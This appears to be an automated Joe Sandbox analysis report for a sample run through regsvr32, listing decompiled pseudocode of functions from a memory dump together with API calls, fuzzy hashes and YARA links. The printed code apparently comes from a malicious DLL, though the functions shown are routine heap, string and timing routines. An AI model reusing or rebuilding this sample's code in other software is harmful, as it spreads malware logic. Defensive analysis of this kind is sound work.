0x02af1291
0x02af1291

APIs

Part of subcall function 02AF39E3: GetModuleHandleA.KERNEL32(4C44544E,00000000,02AF10C5,00000001), ref: 02AF39F2

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 02AF1142

Part of subcall function 02AF1F1D: GetVersionExA.KERNEL32(?,00000042,00000000), ref: 02AF1F41
Part of subcall function 02AF1F1D: wsprintfA.USER32 ref: 02AF1FA5

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

memset.NTDLL ref: 02AF119C
RtlInitializeCriticalSection.NTDLL(04F895C0), ref: 02AF11AD

Part of subcall function 02AF4F6E: memset.NTDLL ref: 02AF4F88
Part of subcall function 02AF4F6E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 02AF4FCE
Part of subcall function 02AF4F6E: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 02AF4FD9

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 02AF11D8
wsprintfA.USER32 ref: 02AF1208

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: AllocateHandleHeapmemsetwsprintf$CloseCriticalInitializeModuleSectionVersionlstrlen
String ID:
API String ID: 1825273115-0
Opcode ID: a0d56fc3a70eb2736c98320fd2b6e852045e0f44e27c7eea607f5d5ae460e0f3
Instruction ID: f27d73b04d63aa5e2d7e654a69be2b16b404df3621825e93cf8353ea8db5d766
Opcode Fuzzy Hash: a0d56fc3a70eb2736c98320fd2b6e852045e0f44e27c7eea607f5d5ae460e0f3
Instruction Fuzzy Hash: 6151A071E80214EBDBE0ABE4DC88BAEB3B8AB08744F104869F709E7241DF7D95558F54

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3EE9 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E02AF3EE9(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E02AF7A71(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E02AF789E(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E02AF7A71((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x2afa318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x02af3ef0
0x02af3ef7
0x02af3efc
0x02af3eff
0x02af3f06
0x02af3f09
0x02af3f0c
0x02af3f11
0x02af3f16
0x02af406a
0x02af406c
0x02af406e
0x02af4073
0x02af4073
0x02af3f1c
0x02af3f1f
0x02af3f22
0x02af3f24
0x02af3f24
0x02af3f28
0x00000000
0x00000000
0x02af3f2c
0x02af3f58
0x02af3f5d
0x02af3f5f
0x02af3f5f
0x02af3f62
0x02af3f65
0x02af3f65
0x02af3f67
0x00000000
0x02af3f32
0x02af3f34
0x02af3f53
0x02af3f53
0x02af3f6a
0x02af3f6a
0x02af3f6b
0x02af3f6b
0x02af3f6e
0x00000000
0x00000000
0x00000000
0x02af3f6e
0x02af3f38
0x02af3f7f
0x02af3f83
0x02af405d
0x02af405f
0x02af405f
0x02af4060
0x02af4063
0x00000000
0x02af4063
0x02af3f8c
0x02af3f9d
0x02af3fa1
0x02af4059
0x00000000
0x02af4059
0x02af3fa7
0x02af3faa
0x02af3fae
0x02af3fb2
0x02af3fb7
0x02af404f
0x02af404f
0x00000000
0x02af4055
0x02af3fc2
0x02af3fcb
0x02af3fdf
0x02af3fe6
0x02af3ffb
0x02af4001
0x02af4009
0x00000000
0x00000000
0x00000000
0x00000000
0x02af400b
0x02af400b
0x02af400b
0x02af4012
0x02af401a
0x00000000
0x00000000
0x02af401c
0x02af4025
0x00000000
0x00000000
0x00000000
0x02af4027
0x02af4029
0x02af402c
0x02af402c
0x02af402f
0x02af4033
0x02af4036
0x02af403c
0x02af403f
0x02af4046
0x00000000
0x02af3fc2
0x02af3f3d
0x02af3f45
0x02af3f4b
0x02af3f4d
0x02af3f4d
0x02af3f50
0x02af3f52
0x00000000
0x02af3f52
0x02af3f2c
0x02af3f72
0x02af3f77
0x02af3f79
0x02af3f79
0x02af3f7c
0x02af3f7c
0x00000000

APIs

Part of subcall function 02AF7A71: RtlAllocateHeap.NTDLL(00000000,00000000,02AF4DB1), ref: 02AF7A7D

lstrcpy.KERNEL32(69B25F45,00000020), ref: 02AF3FE6
lstrcat.KERNEL32(69B25F45,00000020), ref: 02AF3FFB
lstrcmp.KERNEL32(00000000,69B25F45), ref: 02AF4012
lstrlen.KERNEL32(69B25F45), ref: 02AF4036

Strings

, xrefs: 02AF3F7F

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: 817304d58845bc88ffd94bb93b7b90241fb7818394a9d344524b340b5523793b
Instruction ID: 257ef2eada17bf3dbfca7749e7f9a162e8a8fbc80646f21ac8a5cc6bd39d12f0
Opcode Fuzzy Hash: 817304d58845bc88ffd94bb93b7b90241fb7818394a9d344524b340b5523793b
Instruction Fuzzy Hash: FB51B371A00208EBDF61CFD9C5847AEBBB6FF45354F15809AFA159F201CB79AA51CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02AF61FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF61FE(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E02AF1CE6(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x2afa348; // 0x248d5a8
				_t4 = _t24 + 0x2afbe30; // 0x4f893d8
				_t5 = _t24 + 0x2afbdd8; // 0x4f0053
				_t26 = E02AF3A53( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x2afa348; // 0x248d5a8
						_t11 = _t32 + 0x2afbe24; // 0x4f893cc
						_t48 = _t11;
						_t12 = _t32 + 0x2afbdd8; // 0x4f0053
						_t52 = E02AF262D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x2afa348; // 0x248d5a8
							_t13 = _t35 + 0x2afbe6e; // 0x30314549
							if(E02AF3969(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x2afa2fc - 6;
								if( *0x2afa2fc <= 6) {
									_t42 =  *0x2afa348; // 0x248d5a8
									_t15 = _t42 + 0x2afbdba; // 0x52384549
									E02AF3969(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x2afa348; // 0x248d5a8
							_t17 = _t38 + 0x2afbe68; // 0x4f89410
							_t18 = _t38 + 0x2afbe40; // 0x680043
							_t40 = E02AF187F(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x2afa2d8, 0, _t52);
						}
					}
					HeapFree( *0x2afa2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E02AF1544(_t54);
				}
				return _t45;
			}

0x02af61fe
0x02af620e
0x02af6211
0x02af6218
0x02af621a
0x02af621a
0x02af621d
0x02af6222
0x02af6229
0x02af6236
0x02af623b
0x02af623f
0x02af624d
0x02af625b
0x02af625f
0x02af62f0
0x02af62f0
0x02af6265
0x02af6265
0x02af626a
0x02af626a
0x02af6271
0x02af627d
0x02af627f
0x02af6281
0x02af6283
0x02af628a
0x02af629c
0x02af629e
0x02af62a5
0x02af62a7
0x02af62ae
0x02af62b9
0x02af62b9
0x02af62a5
0x02af62be
0x02af62c3
0x02af62ca
0x02af62da
0x02af62e8
0x02af62ea
0x02af62ea
0x02af6281
0x02af62fc
0x02af62fc
0x02af62fe
0x02af6303
0x02af6305
0x02af6305
0x02af6310

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F893D8,00000000,?,7476F710,00000000,7476F730), ref: 02AF624D
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F89410,?,00000000,30314549,00000014,004F0053,04F893CC), ref: 02AF62EA
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02AF521B), ref: 02AF62FC

Strings

Uqt, xrefs: 02AF6253

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 2cf1a9d9ff0bc01749bca4e6e84766b879eb010b6f6d03ca77d6f17053ab47e1
Instruction ID: 50c42a1bbae64fa6894ebb01ae2003b71b15433e4cfc87b206056fbabc0843a2
Opcode Fuzzy Hash: 2cf1a9d9ff0bc01749bca4e6e84766b879eb010b6f6d03ca77d6f17053ab47e1
Instruction Fuzzy Hash: 3431C432E40208EEDB91ABD4DC84EDAB7BDEB08B04F0105A5BB5497121DF789A15DF10

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2689 Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 02AF26E6
SysAllocString.OLEAUT32(02AF23DF), ref: 02AF272A
SysFreeString.OLEAUT32(00000000), ref: 02AF273E
SysFreeString.OLEAUT32(00000000), ref: 02AF274C

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: b593a5cc39abbf71151db5b5f178bbf65b427c30c2afc767ec1e4d22b266f6bd
Instruction ID: e8300e1691bf9cc24d19b41722bc5e9df8e3c0b94d9bb183bcaf6741df882155
Opcode Fuzzy Hash: b593a5cc39abbf71151db5b5f178bbf65b427c30c2afc767ec1e4d22b266f6bd
Instruction Fuzzy Hash: E7312C75900209EFCB54DFD8D8D4AAEBBB5FF08344B10842EFA0697250DB389941CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02AF2CEC Relevance: 6.0, APIs: 4, Instructions: 44
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E02AF2CEC(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t17;
				signed int _t18;
				unsigned int _t22;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t22 = _v12.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L02AF8406();
					_t34 = _t16 + _t13;
					_t17 = E02AF4D24(_a4, _t34);
					_t30 = _t17;
					_t18 = 3;
					Sleep(_t18 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}

0x02af2cf1
0x02af2cfc
0x02af2cfd
0x02af2cfd
0x02af2d09
0x02af2d12
0x02af2d15
0x02af2d19
0x02af2d1b
0x02af2d20
0x02af2d21
0x02af2d22
0x02af2d2c
0x02af2d2f
0x02af2d36
0x02af2d3a
0x02af2d41
0x02af2d47
0x02af2d51

APIs

SwitchToThread.KERNEL32(?,00000001,?,?,?,02AF72FE,?,?), ref: 02AF2CFD
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,02AF72FE,?,?), ref: 02AF2D09
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 02AF2D22

Part of subcall function 02AF4D24: memcpy.NTDLL(00000000,00000002,?,?,?,00000000,00000000), ref: 02AF4DC3

Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,02AF72FE,?,?), ref: 02AF2D41

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: fea6f0d832328bc6ffd1555e8bb0115f75e49ed9321b3c142635a77c2028376f
Instruction ID: d8ea92851d87440dcd908aadb1ca5aeeaa3410b58b21b6f4de7ff427d848842c
Opcode Fuzzy Hash: fea6f0d832328bc6ffd1555e8bb0115f75e49ed9321b3c142635a77c2028376f
Instruction Fuzzy Hash: 2BF0A477A802047BD7149AE4CC59FDF76B9D784361F100524FB02E7240EABCDA018AA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF4076 Relevance: 4.6, APIs: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E02AF4076(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E02AF7A71(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x2af9278); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}

0x02af407a
0x02af4087
0x02af4089
0x02af408a
0x02af4092
0x02af4092
0x02af4096
0x00000000
0x00000000
0x02af408d
0x02af408e
0x02af4091
0x02af4091
0x02af409e
0x02af40a3
0x02af40a8
0x02af40b0
0x02af40b6
0x02af40b8
0x02af40bb
0x02af40bf
0x02af40c1
0x02af40c4
0x02af40c4
0x02af40c5
0x02af40c7
0x02af40c4
0x02af40d1
0x02af40d4
0x02af40d7
0x02af40d8
0x02af40da
0x02af40e1
0x02af40e1
0x02af40ed

APIs

StrChrA.SHLWAPI(?,00000020,00000000,04F895FC,?,?,02AF3DCB,?,04F895FC), ref: 02AF4092
StrTrimA.SHLWAPI(?,02AF9278,00000002,?,02AF3DCB,?,04F895FC), ref: 02AF40B0
StrChrA.SHLWAPI(?,00000020,?,02AF3DCB,?,04F895FC), ref: 02AF40BB

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 4628c0559f2b2cb46c412a526b1837559c6515520e163414d6ebc39a9611f0e4
Instruction ID: e7483b374daa864d6298c947afbce6b9e520613c11a1c0e794c941a99dda0585
Opcode Fuzzy Hash: 4628c0559f2b2cb46c412a526b1837559c6515520e163414d6ebc39a9611f0e4
Instruction Fuzzy Hash: 2701DF71340346AFE7A04BAACC88F67BB9DEBC9384F454011BB45CB682DE3CC842C660

Uniqueness

Uniqueness Score: -1.00%

Function 02AF789E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF789E(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x2afa2d8, 0, _a4); // executed
				return _t2;
			}

0x02af78aa
0x02af78b0

APIs

RtlFreeHeap.NTDLL(00000000,00000000,02AF4E3E,00000000,?,00000000,00000000), ref: 02AF78AA

Strings

Uqt, xrefs: 02AF78AA

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID: Uqt
API String ID: 3298025750-2320327147
Opcode ID: 050bf78ef1effe6f18d361d500c6e68a394108f30e3314dc825870d5735478c9
Instruction ID: 1e0646447c0161f14c5eab5d665db0a7aa71ca2d07da555e88b6283e373d94e9
Opcode Fuzzy Hash: 050bf78ef1effe6f18d361d500c6e68a394108f30e3314dc825870d5735478c9
Instruction Fuzzy Hash: 6EB01271A80300ABCB514B80DE04F06BA21A790700F104810B30800071CB369472FB15

Uniqueness

Uniqueness Score: -1.00%

Function 02AF4BD5 Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02AF4BD5(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E02AF2689(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x2afa348; // 0x248d5a8
						_t20 = _t68 + 0x2afb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E02AF1061(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x02af4bdb
0x02af4bde
0x02af4bee
0x02af4bf7
0x02af4bfb
0x02af4cc9
0x02af4ccf
0x02af4ccf
0x02af4c15
0x02af4c1a
0x02af4c1e
0x02af4c24
0x02af4c29
0x02af4c30
0x02af4c3f
0x02af4c3f
0x02af4c43
0x02af4c45
0x02af4c51
0x02af4c5c
0x02af4c67
0x02af4c6b
0x02af4c75
0x02af4c79
0x02af4c7b
0x02af4c80
0x02af4c87
0x02af4c97
0x02af4c97
0x02af4c80
0x02af4c79
0x02af4c99
0x02af4c9e
0x02af4ca3
0x02af4ca3
0x02af4ca6
0x02af4caf
0x02af4cb4
0x02af4cb4
0x02af4cb9
0x02af4cbe
0x02af4cbe
0x02af4cb9
0x02af4c43
0x02af4cc0
0x02af4cc6
0x00000000

APIs

Part of subcall function 02AF2689: SysAllocString.OLEAUT32(80000002), ref: 02AF26E6
Part of subcall function 02AF2689: SysFreeString.OLEAUT32(00000000), ref: 02AF274C

SysFreeString.OLEAUT32(?), ref: 02AF4CB4
SysFreeString.OLEAUT32(02AF23DF), ref: 02AF4CBE

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

Associated: 00000003.00000002.816907869.0000000002AF0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816934255.0000000002AF9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816949542.0000000002AFA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.816963248.0000000002AFC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2af0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: a8cd9dac8e359b549408502cf01ea1bbf006209c233aa900b17d04e5bdbe9977
Instruction ID: 69e094d0fd477e1ad97c04c63de082f62faea727133f654334d01b3bd86f329f
Opcode Fuzzy Hash: a8cd9dac8e359b549408502cf01ea1bbf006209c233aa900b17d04e5bdbe9977
Instruction Fuzzy Hash: 10315A71500109EFCB21DFA5C888C9BBB7AFFC97447154A58FA059B210DB36DD52CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02AF3A53 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02AF3A53(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E02AF78B3(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x2afa2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E02AF5BB5(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x02af3a53
0x02af3a5b
0x02af3a72
0x02af3a8d
0x02af3a91
0x02af3a96
0x02af3a98
0x02af3aaa
0x02af3ab6
0x02af3a9a
0x02af3a9a
0x02af3a9f
0x02af3aa4
0x02af3aa4
0x02af3a98
0x02af3abc
0x02af3ac0
0x02af3ac0
0x02af3a67
0x02af3a6c
0x02af3a70
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 02AF5BB5: SysFreeString.OLEAUT32(00000000), ref: 02AF5C18

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7476F710,?,00000000,?,00000000,?,02AF623B,?,004F0053,04F893D8,00000000,?), ref: 02AF3AB6

Strings

Uqt, xrefs: 02AF3AB6

Memory Dump Source

Source File: 00000003.00000002.816912435.0000000002AF1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AF0000, based on PE: true

